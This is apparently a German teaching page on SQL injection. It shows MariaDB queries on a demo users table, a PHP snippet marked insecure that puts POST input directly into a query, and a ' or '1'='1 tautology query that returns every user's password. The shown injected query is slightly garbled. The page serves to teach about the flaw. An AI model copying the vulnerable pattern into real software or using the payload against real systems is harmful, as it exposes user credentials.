Vorüberlegung
Verhaltensweise einer SQL Abfrage
- Normale Abfrage
- MariaDB [sql_injections]> select * from users where username = 'rudi.burkart';
+------+--------------+----------+
| id | username | password |
+------+--------------+----------+
| 2 | rudi.burkart | secret |
+------+--------------+----------+
1 row in set (0.000 sec)
- Oder Verknüpfung
- MariaDB [sql_injections]> select * from users where username = 'rudi.burkart' or username = 'hans.will';
+------+--------------+----------+
| id | username | password |
+------+--------------+----------+
| 2 | rudi.burkart | secret |
| 1 | hans.will | geheim |
+------+--------------+----------+
2 rows in set (0.000 sec)
PHP Code
Unsicher
$search = $_POST['search'];
$sql = "SELECT * FROM users WHERE username='$search'";
$result = mysqli_query($link, $sql);
- Diese Eingabe bewirkt nun
- folgende Sql Abfrage
- MariaDB [sql_injections]> select * from users where username = or '1' = '1';
+------+---------------+-------------+
| id | username | password |
+------+---------------+-------------+
| 2 | rudi.burkart | secret |
| 3 | erwin.lehmann | weisniemand |
| 1 | hans.will | geheim |
+------+---------------+-------------+
3 rows in set (0.000 sec)
- Da '1' = '1" werden alle Datensätze angezeigt
Webfrontend